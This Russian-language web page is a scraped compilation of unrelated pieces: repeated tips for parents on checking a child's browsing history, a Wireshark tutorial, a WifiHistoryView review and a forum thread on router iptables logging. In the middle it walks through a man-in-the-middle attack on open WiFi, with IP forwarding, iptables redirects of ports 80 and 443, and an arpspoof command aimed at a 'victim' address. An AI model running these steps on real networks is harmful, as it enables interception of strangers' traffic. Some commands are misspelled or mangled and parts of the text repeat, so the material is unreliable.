Elettracompany.com

Компьютерный справочник
110 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Как посмотреть историю сайтов на роутере

Как узнать, на какие сайты заходит ребенок?

На какие сайты заходит мой ребенок? Этот вопрос рано или позно задают себе все папы и мамы, чье чадо, заполучив вожделенный Windows-компьютер или планшет, принялось со всей активностью осваивать все просторы и закоулки всемирной Сети, или как сейчас модно говорить «серфить» в Интернете.

И эффективно проконтролировать виртуальные похождения своего дитяти может далеко не каждый родитель, в особенности если ребенок уже умеет удалять историю в браузере своего компьютера.

Скажем сразу, если ваши сын или дочь кое-чего уже научились, и по крайней мере знают, как правильно использовать функции приватных режимов просмотра в Internet Explorer (InPrivate browsing mode) или Google Chrome (Incognito mode), то история посещений (т.е. на какие сайты заходил ребенок и какие страницы на этих сайтах просматривал), в этих браузерах сохраняться не будут.

Если же до такого ваш ребенок еще не додумался, и его не надоумили на это более продвинутые в техническом плане друзья, то проверить, на какие сайты он заходил, можно путем просмотра DNS кэша его ПК. Для это в командной строке устройства нужно набрать ipconfig /displaydns и нажать Enter.

Данная команда позволяет оперативно получить перечень всех сайтов, на которые заходили с данного конкретного компьютера. Следует иметь в виду, что в списке буду содержаться не только те веб-страницы, на которые были прямые заходы с ПК вашего ребенка, но также косвенно доступный через такие страницы контент .

Таким контентом могут быть, к примеру, реклама или объявления сомнительного содержания, которые размещались на вполне приличных и безобидных сайтах. В этой связи, прежде чем выдвигать какие-либо обвинения, следует грамотно разобраться с полученной информацией.

Страницы, на которые были прямые заходы с ПК в списке, полученном через команду ipconfig /displaydns, отображаются как правило с знакомым всем «www.», однако не всегда.

Более надежный, но несколько более сложный способ мониторинга онлайн-деятельности вашего ребенка состоит в том, чтобы настроить ваш домашний роутер на сохранение его собственных логов через систему SysLog. Это позволит сохранять историю посещений всех подключенных к вашей домашней сети компьютеров (смартфонов и планшетов), притом записи нельзя будет удалить просто так, без административного доступа к вашему роутеру.

Функция SysLog предусмотрена практически в каждом современном маршрутизаторе, одна для ее эффективной реализации необходимы определенные знания, к тому же в разных моделях роутеров настраивается она по-разному. Тем не менее, в некоторых случаях необходимость понимать, на какие сайты ходит ребенок, и более жестко контролировать его онлайн-прогулки стоит того, чтобы почитать инструкцию к роутеру и озадачить поисковик на предмет пошаговой настройки SysLog для данной модели.

Чуть более простой вариант мониторинга веб-серфинга — это такие сравнительно несложные в использовании онлайн-сервисы как, к примеру, OpenDNS, позволяющие предотвращать доступ пользователей одного или нескольких компьютеров к нежелательному содержимому сайтов, защищать компьютеры от вирусов, распространяемого через интернет, получать релевантны результаты поиска по интернету при запросе несуществующего адреса сайта или сайта, временно недоступного из-за сбоев, и пр. Однако об OpenDNS мы расскажем в одной из следующих статей.

Идеальный способ узнать какие сайты Вы посещаете через открытый WiFi

Установка и запуск WireShark

WireShark — это крайне полезная и мощная программа для перехвата трафика и анализа активности в локальных сетях. В Kali Linux эта программа уже установлена и готова к использованию, а в Windows её нужно установить дополнительно ( версия для windows ).

Если в Вашем линуксе программа не установлено, то её можно установить из менеджера пакетов или в терминале командой

sudo atp-get install wireshar

Для запуска воспользуемся терминалом и запустим от имени Супер-пользователя.

Выбираем нужный нам интерфейс для анализа трафика. После выбора интерфейса мониторинга вид программы меняется

Прежде чем начать смотреть трафик в сети, попробуйте на себе. Перехватите Ваш трафик из Вашего браузер. Просто посетите несколько страница на ПК где запущен WireShark и посмотрите результат. Разберите пакеты, проанализируйте их содержимое.

Читать еще:  Настройка роутера для онлайн игр

Wireshark — Мощное средство, а сетевая активность может быть большой. По-этому в интерфейсе программы может оказаться 1000 записей. Для фильтрации можно использовать следующие параметры:

1. ip.proto — Сортировка по протоколу
2. ip.src — сортировка по отправителю
3. ip.dst — сортировка по получателю
4. ip.addr — сортировка по адресу

Между названием фильтра и значением нужно поставить логический символ. Условия можно объединять

== — равно
|| — или то или это (логическое или)
& — и то и то (логическое и)
> — больше
sudo netdiscover

Такая, примерно, картина у Вас должна получиться.

Если список активных клиентов большой (например вы сидите в макдональдсе) можно список сохранить в файл, правда уже другой программой — fping.

fping -Asg 192.168.1.0/24 -r 3 >> hosts_active.txt

Результат выполнения окажется в файле hosts_active.txt.

IP адреса нам нужны для подстановки в программу Wireshark, а именно в фильтры. Пример фильтра:

IP-адреса могут меняться при переподключении. Тогда фильтруем по MAC-адресу:

Никто не запрещает комбинировать фильтры:

Атака «Человек посередине»

В англоязычной литературе данная атака называется MITM. Суть этой атаки заключается в следующем — когда клиент подключается к серверу, то открывается канал связи и клиент доверяет и думает, что сервер настоящий. Перехватчик выступает транслирующим звеном и говорит клиенту «я настоящий сервер», а серверу — «я настоящий клиент». Тем самым транслирует трафик одного другому.

Чтобы реализовать у себя такую схему подключения мы выполним следующие команды.

sudo cat /proc/sys/net/ipv4/ip_forward #check forwarding packets, 1-on, 0-off

Если вывелось 1, то следующую команду пропустите

echo «1» > /proc/sys/net/ipv4/ip_forward #enable forwarding packets

Допишем несколько правил в сетевые настройки

sudo bash iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-port 8282 #Redirecting traffic from 80 ports to 8282

iptables -t nat -A PREROUTING -p tcp —destination-port 443 -j REDIRECT —to-port 8282 #Redirecting traffic from 443 ports to 8282

Стартуем команду для перехвата трафика жертвы. Сначала запускаем wireshark, а лишь потом команду:

arpfpoof -i -t где, жертва — ip-адрес жертвы, шлюз — ip-адрес роутера

Например, для атаки на жертву с ip-адресом 192.168.0.100, а роутером 192.168.0.1 команда примет вид:

arpspoof -i wlp3s0 -t 192.168.0.100 192.168.0.1

Завершающую работу по анализу перехваченных данных производим в программе wireshark.

Заключение

Если вы подключаетесь к открытым wifi сетям, то будьте очень внимательны при переда данных в них. Используйте зашифрованное соединение и другие методы защиты.

*Статья ни в коем случае не призывает к действиям, а лишь демонстрирует возможности программного обеспечения!

Как узнать, на какие сайты заходит ребенок?

На какие сайты заходит мой ребенок? Этот вопрос рано или позно задают себе все папы и мамы, чье чадо, заполучив вожделенный Windows-компьютер или планшет, принялось со всей активностью осваивать все просторы и закоулки всемирной Сети, или как сейчас модно говорить «серфить» в Интернете.

И эффективно проконтролировать виртуальные похождения своего дитяти может далеко не каждый родитель, в особенности если ребенок уже умеет удалять историю в браузере своего компьютера.

Скажем сразу, если ваши сын или дочь кое-чего уже научились, и по крайней мере знают, как правильно использовать функции приватных режимов просмотра в Internet Explorer (InPrivate browsing mode) или Google Chrome (Incognito mode), то история посещений (т.е. на какие сайты заходил ребенок и какие страницы на этих сайтах просматривал), в этих браузерах сохраняться не будут.

Если же до такого ваш ребенок еще не додумался, и его не надоумили на это более продвинутые в техническом плане друзья, то проверить, на какие сайты он заходил, можно путем просмотра DNS кэша его ПК. Для это в командной строке устройства нужно набрать ipconfig /displaydns и нажать Enter.

Читать еще:  Влияет ли на пинг роутер

Данная команда позволяет оперативно получить перечень всех сайтов, на которые заходили с данного конкретного компьютера. Следует иметь в виду, что в списке буду содержаться не только те веб-страницы, на которые были прямые заходы с ПК вашего ребенка, но также косвенно доступный через такие страницы контент .

Таким контентом могут быть, к примеру, реклама или объявления сомнительного содержания, которые размещались на вполне приличных и безобидных сайтах. В этой связи, прежде чем выдвигать какие-либо обвинения, следует грамотно разобраться с полученной информацией.

Страницы, на которые были прямые заходы с ПК в списке, полученном через команду ipconfig /displaydns, отображаются как правило с знакомым всем «www.», однако не всегда.

Более надежный, но несколько более сложный способ мониторинга онлайн-деятельности вашего ребенка состоит в том, чтобы настроить ваш домашний роутер на сохранение его собственных логов через систему SysLog. Это позволит сохранять историю посещений всех подключенных к вашей домашней сети компьютеров (смартфонов и планшетов), притом записи нельзя будет удалить просто так, без административного доступа к вашему роутеру.

Функция SysLog предусмотрена практически в каждом современном маршрутизаторе, одна для ее эффективной реализации необходимы определенные знания, к тому же в разных моделях роутеров настраивается она по-разному. Тем не менее, в некоторых случаях необходимость понимать, на какие сайты ходит ребенок, и более жестко контролировать его онлайн-прогулки стоит того, чтобы почитать инструкцию к роутеру и озадачить поисковик на предмет пошаговой настройки SysLog для данной модели.

Чуть более простой вариант мониторинга веб-серфинга — это такие сравнительно несложные в использовании онлайн-сервисы как, к примеру, OpenDNS, позволяющие предотвращать доступ пользователей одного или нескольких компьютеров к нежелательному содержимому сайтов, защищать компьютеры от вирусов, распространяемого через интернет, получать релевантны результаты поиска по интернету при запросе несуществующего адреса сайта или сайта, временно недоступного из-за сбоев, и пр. Однако об OpenDNS мы расскажем в одной из следующих статей.

История WiFi подключений с помощью программы WifiHistoryView

История WiFi подключений. Способ быстро посмотреть историю WiFi.

Сегодня я хочу рассказать о небольшой программе, которая позволяет вытащить историю WiFi подключений компьютера. На самом деле можно посмотреть историю Wi-Fi и без использования софта, но это довольно муторно и берет время. Намного лучше использовать специальную утилиту, особенно если она бесплатная, крохотная и не просит кушать.

История WiFi подключений

WifiHistoryView — маленькая бесплатная программа, которая позволяет просмотреть историю подключений компьютера к WiFi-сетям. Разработчик программы известный израильский программист Нир Софер (NirSoft). Который известен своим качественным и абсолютно бесплатным софтом.

Скачать WifiHistoryView

Скачать бесплатно WifiHistoryView вы можете по этой прямой ссылке с официального сайта разработчика английскую версию. Или по этой ссылке уже русифицированную с файлообменика.

Программа работает на операционной системе: Windows 10, 8, 7, Vista, XP.

Установка WifiHistoryView

После того как скачали программу, разархивируйте скачанный архив и запустите его. Установка не требуется, программа портабельная, может запускаться и с флешки. Единственное что может в некоторых случаях потребоваться — это запуск исполняемого файла от администратора.

Работа с WifiHistoryView

После запуска программы вы увидите главное окно. После того как программа нашла и отобразила все подключения, вы можете сохранить отдельные данные или весь лог целиком. Сохранять отчет можно во все популярные форматы: txt, csv, html, xml и т.д.

WifiHistoryView

Утилита отображает следующие данные:

  • Время событие
  • Типа события
  • Сетевой адаптер
  • GUID интерфейса
  • Локальный MAC-адрес
  • Профиль
  • SSID
  • BSS-тип
  • BSSID
  • BSSID-компании
  • PHY-тип
  • Аутентификация
  • Шифрование
  • Причина отключения
  • ID-события
  • ID записи о событие

Один из плюсов программы — это возможность запуска из командной строки. Данная опция будет полезна тем кто хочет получить информацию о подключении к WiFi сетям удаленно. С помощью того же Kali Linux или просто используя командную строку.

Читать еще:  Как узнать что роутер сломался

Программа вытаскивает информацию используя лог-файл операционной системы. Это значит, что имея этот лог-файл который находится в директории:

Вы можете найти всю необходимую информацию. Т.е. если у вас нет боевой флешки с этой программой, вы можете на удаленной машине найти этот файл, скачать его, а на локальном компьютере открыть с помощью данной утилиты.

На этом все друзья. Надеюсь вам помогла данная статья, и вы смогли вытащить историю WiFi подключений. Напоминаю, что используя форму поиска сайта по слову WiFi вы можете найти кучу полезной информации.

Всем удачи и с наступившим новым 2016 годом!

Роутер. Писать лог посещенных сайтов клиентами

Здраствуйте
Стоит задача писать в лог посещенные клиентами сайты.
Сервер это роутер Asus rt-n66u. Достаточно знать какой ip на какой ip. ходит. Веб морда не нужна.
В принципе могу проинсталировать пакет, но вопрос какой?

Я пробовал
netstat -antup
но в обычном линуксе вывод человеческий,
В роутере фигня, ключ -р он не знает
Куда рыть?

Прошивка merlin последняя для моей модели

Когда начал читать, думал, что понял про что речь. Но дочитав до netstat споткнулся. Мне не понятно, какой вывод от netstat вы ожидали получить на маршрутизаторе? Да ещё с ключём ″u″ (udp), если речь идёт о сайтах, а не о DNS/торрентах.

Ну если достаточно только ip и вы готовы сами разгребать данные, то создайте в iptables ″-j LOG″ правило, которое будет записывать все исходящие tcp-пакеты с состоянием ″NEW″. Но не понятно, на чём в хотите это обрабатывать, данных будет много, их обычно складывают в БД, но не будете же вы ставить на Asus какую-нибудь СУБД?

прокся тебе нужна прозрачная. но не уверен что на роутер ее можно поставить.

Стоит задача писать в лог посещенные клиентами сайты.

Сервер это роутер

Он сдохнет от этого. Ну или, интерфейс будет забит под завязку логами.

Посмотрите в сторону transparent proxy.

Вот с iptables прошу уточнить. Грэпать и искать я умею, удалять все что свыше 1000 строк или по крону тоже смогу. Да хоть в архив. Меня интересует только кто с кем соединялся, (Если будет легко, добавлю еще — когда соединялся). Вся остальная статистика не будет записываться
Будьте добры, бросьте линк на инструкцию iptables ″-j LOG″ правило/мануал на любом языке. С ходу не нарыл

Он сдохнет от этого. Ну или, интерфейс будет забит под завязку логами

Нет, не сдохнет, нагрузка на него в принципе не большая, логи я могу хранить подсоединив к ЮСБ диск или флешку любого размера. Удаление, архивирование мне тоже помогут. Запись будет лишь факта установления соединения

tcpdump можно поставить и писать в лог первые 50-60 байт от IP пакетов, чтоб заголовки HTTP запросов сохранялись

Он сдохнет от этого. Ну или, интерфейс будет забит под завязку логами.

Наверняка можно заставить iptables гнать лог на отдельную машину. Префикс, netcat, вывод в файл сокета вместо /var/log/messages.

man iptables. Базовое правило будет что-то типа этого:

iptables -I FORWARD —ctstate NEW -j LOG

Это будет логирование попыток установления соединения (то есть кто и куда пытался подключиться, но не факт, что получилось).

Можно попробовать логировать первый ответный пакет соединения, если он есть, значит точно подключение было:

iptables -I FORWARD -m connbytes 1:1 —connbytes-dir reply —connbytes-mode packets -j LOG

но не знаю, есть ли у вас connbytes в iptables.

Ну далее можно давать этим правилам дополнительные условия, чтобы, допустим, только tcp-протокол. Но, это именно будут ip-адреса, а не URL.

Ну и там указываете log-level и настраиваете запись логов в отдельный файл или по сети http://unix.stackexchange.com/questions/96484/how-can-i-configure-syslog-conf.

задача выглядит неадекватно, но мне нравится вариант с tcpdump, ибо можно гибко настроить фильтры и ротацию

Ссылка на основную публикацию
ВсеИнструменты 220 Вольт
Adblock
detector